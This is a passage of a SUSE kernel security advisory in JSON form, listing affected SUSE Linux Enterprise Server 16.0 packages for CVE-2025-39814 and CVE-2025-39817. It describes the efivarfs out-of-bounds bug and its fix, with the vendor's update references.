"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39814"
},
{
"cve": "CVE-2025-39817",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39817"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nefivarfs: Fix slab-out-of-bounds in efivarfs_d_compare\n\nObserved on kernel 6.6 (present on master as well):\n\n BUG: KASAN: slab-out-of-bounds in memcmp+0x98/0xd0\n Call trace:\n kasan_check_range+0xe8/0x190\n __asan_loadN+0x1c/0x28\n memcmp+0x98/0xd0\n efivarfs_d_compare+0x68/0xd8\n __d_lookup_rcu_op_compare+0x178/0x218\n __d_lookup_rcu+0x1f8/0x228\n d_alloc_parallel+0x150/0x648\n lookup_open.isra.0+0x5f0/0x8d0\n open_last_lookups+0x264/0x828\n path_openat+0x130/0x3f8\n do_filp_open+0x114/0x248\n do_sys_openat2+0x340/0x3c0\n __arm64_sys_openat+0x120/0x1a0\n\nIf dentry-\u003ed_name.len \u003c EFI_VARIABLE_GUID_LEN , \u0027guid\u0027 can become\nnegative, leadings to oob. The issue can be triggered by parallel\nlookups using invalid filename:\n\n T1\t\t\tT2\n lookup_open\n -\u003elookup\n simple_lookup\n d_add\n // invalid dentry is added to hash list\n\n\t\t\tlookup_open\n\t\t\t d_alloc_parallel\n\t\t\t __d_lookup_rcu\n\t\t\t __d_lookup_rcu_op_compare\n\t\t\t hlist_bl_for_each_entry_rcu\n\t\t\t // invalid dentry can be retrieved\n\t\t\t -\u003ed_compare\n\t\t\t efivarfs_d_compare\n\t\t\t // oob\n\nFix it by checking \u0027guid\u0027 before cmp.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39817",
"url": "https://www.suse.com/security/cve/CVE-2025-39817"
},
{
"category": "external",
"summary": "SUSE Bug 1249998 for CVE-2025-39817",
"url": "https://bugzilla.suse.com/1249998"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
